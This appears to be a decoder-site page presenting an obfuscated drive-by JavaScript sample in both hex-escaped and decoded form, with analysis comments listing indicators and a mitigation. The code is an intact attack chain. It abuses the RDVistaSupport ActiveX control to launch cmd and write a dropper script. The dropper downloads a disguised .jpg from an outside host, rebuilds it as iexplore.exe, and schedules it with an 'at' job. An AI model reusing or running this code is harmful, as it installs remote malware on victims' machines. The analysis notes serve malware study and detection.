PHP Decode
<script language=JavaScript> var _0x9558=["\x52\x44\x56\x69\x73\x74\x61\x53\x75\x70\x70\..
Decoded Output download
<? <script language=JavaScript>
// ANALYSIS NOTES -- static reading only; this sample should not be executed.
// As displayed by the decoder, this listing is not valid JavaScript: the hex escapes were
// expanded in place, so quotes and backslashes inside the string table are no longer escaped.
//
// What the visible code does:
//  - _0x9558 is a string table. [0] is the ActiveX ProgID "RDVistaSupport.VistaSupport.1",
//    [1] is the property name "nDestDir", [33] is the method name "rCreateProcess".
//  - check(progId) returns true only when `new ActiveXObject(progId)` succeeds and yields a truthy
//    object; any exception gives false. Everything after it is gated on that result.
//  - When the control is present, the script sets obj.nDestDir = 0x63 and calls
//    obj.rCreateProcess(str, 0). str is entries [2]..[32] concatenated: a `cmd /c echo ...`
//    command redirected into C:\windows\temp\update.js.
//  - It sets nDestDir again and calls rCreateProcess with [34], which runs cscript.exe on update.js.
//  - phkResult and ret are declared but never used; str is assigned without a declaration.
//
// What the echoed script text (entries [2]..[31]) contains:
//  - an XMLHTTP GET of http://www.sejong.org/images/main/img_issue05.jpg, written through
//    ADODB.Stream to C:\windows\temp\conhost.tmp;
//  - a cmd.exe call that writes "MZ" followed by that file into C:\windows\temp\iexplore.exe
//    (presumably the hosted file lacks the leading executable-header bytes; not verifiable here);
//  - an `at` job set one minute ahead, with /EVERY listing all seven days, targeting iexplore.exe;
//  - a cmd.exe call that deletes update.js.
//
// Indicators a defender can take from this listing:
//  - update.js, conhost.tmp and iexplore.exe under C:\windows\temp;
//  - cscript.exe started via `cmd.exe /c` with update.js as its argument;
//  - an `at` scheduled job whose target lives in the temp directory;
//  - a script-host HTTP GET for a .jpg whose body is then written into an .exe.
// NOTE(review): because check() gates the whole chain, removing or kill-bitting the control named
// in [0] should close this path -- confirm against the vendor's guidance for that control.
var _0x9558=["RDVistaSupport.VistaSupport.1","nDestDir","cmd /c echo function getXMLHttpRequest(){","try{return new ActiveXObject("Msxml2.XMLHTTP.6.0");}","catch(e1){","try{return new ActiveXObject("Msxml2.XMLHTTP.5.0");}","catch(e2){","try{return new ActiveXObject("Msxml2.XMLHTTP.4.0");}","catch(e3){","try{return new ActiveXObject("Msxml2.XMLHTTP.3.0");}","catch(e4){","try{return new ActiveXObject("Msxml2.XMLHTTP");}","catch(e5){","try{return new ActiveXObject("Microsoft.XMLHTTP");}","catch(e6){return null;}}}}}}}","var x=getXMLHttpRequest();","var S=new ActiveXObject("ADODB.Stream");","S.Type=1;","x.Open("Get", "http://www.sejong.org/images/main/img_issue05.jpg", 0);","x.Send();","S.Open();","S.Write(x.responseBody);","var fn1="C:\\windows\\temp\\iexplore.exe";","var fn2="C:\\windows\\temp\\conhost.tmp";","S.SaveToFile(fn2,2);","S.Close();","var d = new Date();var Hours = d.getHours();var Minutes = d.getMinutes();Minutes += 1;","var str = " /c at " + Hours + ":" + Minutes + " /EVERY:m,t,w,th,f,s,su " + fn1;","var Q=new ActiveXObject("Shell.Application");","Q.ShellExecute('c:\\windows\\system32\\cmd.exe', '/c "(echo MZ& type ' + fn2 + ') >' + fn1 + '"', '', 'open', 0);","Q.ShellExecute("c:\\windows\\system32\\cmd.exe",str,"","open",0);","Q.ShellExecute("c:\\windows\\system32\\cmd.exe", "/c del C:\\windows\\temp\\update.js", "", "open", 0);"," > C:\\windows\\temp\\update.js","rCreateProcess","c:\windows\system32\cmd.exe /c cscript.exe C:\windows\temp\update.js iexplore.exe"];function check(_0x2ee4x2){var _0x2ee4x3;try{var _0x2ee4x4= new ActiveXObject(_0x2ee4x2);if(_0x2ee4x4){_0x2ee4x3= true}else {_0x2ee4x3= false}}catch(e){_0x2ee4x3= false};return _0x2ee4x3}if(check(_0x9558[0])){var obj= new ActiveXObject(_0x9558[0]);var phkResult;var ret=1;obj[_0x9558[1]]= 0x63;str= _0x9558[2];str+= _0x9558[3];str+= _0x9558[4];str+= _0x9558[5];str+= _0x9558[6];str+= _0x9558[7];str+= _0x9558[8];str+= _0x9558[9];str+= _0x9558[10];str+= _0x9558[11];str+= _0x9558[12];str+= 
_0x9558[13];str+= _0x9558[14];str+= _0x9558[15]+ _0x9558[16]+ _0x9558[17]+ _0x9558[18]+ _0x9558[19]+ _0x9558[20]+ _0x9558[21]+ _0x9558[22]+ _0x9558[23]+ _0x9558[24]+ _0x9558[25]+ _0x9558[26]+ _0x9558[27]+ _0x9558[28]+ _0x9558[29]+ _0x9558[30]+ _0x9558[31];str+= _0x9558[32];obj[_0x9558[33]](str,0);obj[_0x9558[1]]= 0x63;obj[_0x9558[33]](_0x9558[34],0)}
</script> ?>
Original Code
<script language=JavaScript>
// ANALYSIS NOTES -- obfuscated form as submitted; this sample should be read statically, not executed.
// Every entry of the _0x9558 string table is written as \xNN hex escapes, which hides the ProgID,
// file paths, URL and command lines from plain-text search. The page's "Decoded Output" section
// shows the same table with the escapes expanded.
// The listing wraps in the middle of some escapes, so the line breaks here are a display artifact
// and need to be joined before the table is decoded.
//
// Logic after the table (identifiers are renamed but not otherwise hidden):
//  - check(progId) returns true only when `new ActiveXObject(progId)` succeeds and yields a truthy
//    object; any exception gives false.
//  - If check(_0x9558[0]) passes, the script instantiates that control, assigns 0x63 to the property
//    named by [1], concatenates entries [2]..[32] into str, and invokes the method named by [33]
//    with (str, 0).
//  - It assigns 0x63 to the same property again and invokes the same method with entry [34].
//  - phkResult and ret are declared but never used; str is assigned without a declaration.
// Triage hint: a table of \xNN strings indexed through computed property access
// (obj[_0x....[n]]) next to `new ActiveXObject` is a pattern worth flagging in web content.
var _0x9558=["\x52\x44\x56\x69\x73\x74\x61\x53\x75\x70\x70\x6F\x72\x74\x2E\x56\x69\x73\x74\x61\x53\x75\x70\x70\x6F\x72\x74\x2E\x31","\x6E\x44\x65\x73\x74\x44\x69\x72","\x63\x6D\x64\x20\x2F\x63\x20\x65\x63\x68\x6F\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x67\x65\x74\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x28\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x36\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x31\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x35\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x32\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x34\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x33\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x33\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x34\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x35\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x36\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x75\x6C\x6C\x3B\x7D\x7D\x7D\x7D\x7D\x7D\x7D","\x76\x61\x72\x20\x78\x3D\x67\x65\x74\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\
x73\x74\x28\x29\x3B","\x76\x61\x72\x20\x53\x3D\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D\x22\x29\x3B","\x53\x2E\x54\x79\x70\x65\x3D\x31\x3B","\x78\x2E\x4F\x70\x65\x6E\x28\x22\x47\x65\x74\x22\x2C\x20\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x65\x6A\x6F\x6E\x67\x2E\x6F\x72\x67\x2F\x69\x6D\x61\x67\x65\x73\x2F\x6D\x61\x69\x6E\x2F\x69\x6D\x67\x5F\x69\x73\x73\x75\x65\x30\x35\x2E\x6A\x70\x67\x22\x2C\x20\x30\x29\x3B","\x78\x2E\x53\x65\x6E\x64\x28\x29\x3B","\x53\x2E\x4F\x70\x65\x6E\x28\x29\x3B","\x53\x2E\x57\x72\x69\x74\x65\x28\x78\x2E\x72\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x29\x3B","\x76\x61\x72\x20\x66\x6E\x31\x3D\x22\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x69\x65\x78\x70\x6C\x6F\x72\x65\x2E\x65\x78\x65\x22\x3B","\x76\x61\x72\x20\x66\x6E\x32\x3D\x22\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x63\x6F\x6E\x68\x6F\x73\x74\x2E\x74\x6D\x70\x22\x3B","\x53\x2E\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x28\x66\x6E\x32\x2C\x32\x29\x3B","\x53\x2E\x43\x6C\x6F\x73\x65\x28\x29\x3B","\x76\x61\x72\x20\x64\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3B\x76\x61\x72\x20\x48\x6F\x75\x72\x73\x20\x3D\x20\x64\x2E\x67\x65\x74\x48\x6F\x75\x72\x73\x28\x29\x3B\x76\x61\x72\x20\x4D\x69\x6E\x75\x74\x65\x73\x20\x3D\x20\x64\x2E\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73\x28\x29\x3B\x4D\x69\x6E\x75\x74\x65\x73\x20\x2B\x3D\x20\x31\x3B","\x76\x61\x72\x20\x73\x74\x72\x20\x3D\x20\x22\x20\x2F\x63\x20\x61\x74\x20\x22\x20\x2B\x20\x48\x6F\x75\x72\x73\x20\x2B\x20\x22\x3A\x22\x20\x2B\x20\x4D\x69\x6E\x75\x74\x65\x73\x20\x2B\x20\x22\x20\x2F\x45\x56\x45\x52\x59\x3A\x6D\x2C\x74\x2C\x77\x2C\x74\x68\x2C\x66\x2C\x73\x2C\x73\x75\x20\x22\x20\x2B\x20\x66\x6E\x31\x3B","\x76\x61\x72\x20\x51\x3D\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x22\x29\x3B","\x5
1\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x27\x63\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x5C\x63\x6D\x64\x2E\x65\x78\x65\x27\x2C\x20\x27\x2F\x63\x20\x22\x28\x65\x63\x68\x6F\x20\x4D\x5A\x26\x20\x74\x79\x70\x65\x20\x27\x20\x2B\x20\x66\x6E\x32\x20\x2B\x20\x27\x29\x20\x3E\x27\x20\x2B\x20\x66\x6E\x31\x20\x2B\x20\x27\x22\x27\x2C\x20\x27\x27\x2C\x20\x27\x6F\x70\x65\x6E\x27\x2C\x20\x30\x29\x3B","\x51\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x5C\x63\x6D\x64\x2E\x65\x78\x65\x22\x2C\x73\x74\x72\x2C\x22\x22\x2C\x22\x6F\x70\x65\x6E\x22\x2C\x30\x29\x3B","\x51\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x5C\x63\x6D\x64\x2E\x65\x78\x65\x22\x2C\x20\x22\x2F\x63\x20\x64\x65\x6C\x20\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x75\x70\x64\x61\x74\x65\x2E\x6A\x73\x22\x2C\x20\x22\x22\x2C\x20\x22\x6F\x70\x65\x6E\x22\x2C\x20\x30\x29\x3B","\x20\x3E\x20\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x75\x70\x64\x61\x74\x65\x2E\x6A\x73","\x72\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73","\x63\x3A\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63\x20\x63\x73\x63\x72\x69\x70\x74\x2E\x65\x78\x65\x20\x43\x3A\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x74\x65\x6D\x70\x5C\x75\x70\x64\x61\x74\x65\x2E\x6A\x73\x20\x69\x65\x78\x70\x6C\x6F\x72\x65\x2E\x65\x78\x65"];function check(_0x2ee4x2){var _0x2ee4x3;try{var _0x2ee4x4= new ActiveXObject(_0x2ee4x2);if(_0x2ee4x4){_0x2ee4x3= true}else {_0x2ee4x3= false}}catch(e){_0x2ee4x3= false};return _0x2ee4x3}if(check(_0x9558[0])){var obj= new ActiveXObject(_0x9558[0]);var phkResult;var ret=1;obj[_0x9558[1]]= 0x63;str= _0x9558[2];str+= _0x9558[3];str+= _0x9558[4];str+= 
_0x9558[5];str+= _0x9558[6];str+= _0x9558[7];str+= _0x9558[8];str+= _0x9558[9];str+= _0x9558[10];str+= _0x9558[11];str+= _0x9558[12];str+= _0x9558[13];str+= _0x9558[14];str+= _0x9558[15]+ _0x9558[16]+ _0x9558[17]+ _0x9558[18]+ _0x9558[19]+ _0x9558[20]+ _0x9558[21]+ _0x9558[22]+ _0x9558[23]+ _0x9558[24]+ _0x9558[25]+ _0x9558[26]+ _0x9558[27]+ _0x9558[28]+ _0x9558[29]+ _0x9558[30]+ _0x9558[31];str+= _0x9558[32];obj[_0x9558[33]](str,0);obj[_0x9558[1]]= 0x63;obj[_0x9558[33]](_0x9558[34],0)}
</script>
Function Calls
| None |
Stats
| MD5 | e1b6cd2d7a382686a0699239cbc2c940 |
| Eval Count | 0 |
| Decode Time | 83 ms |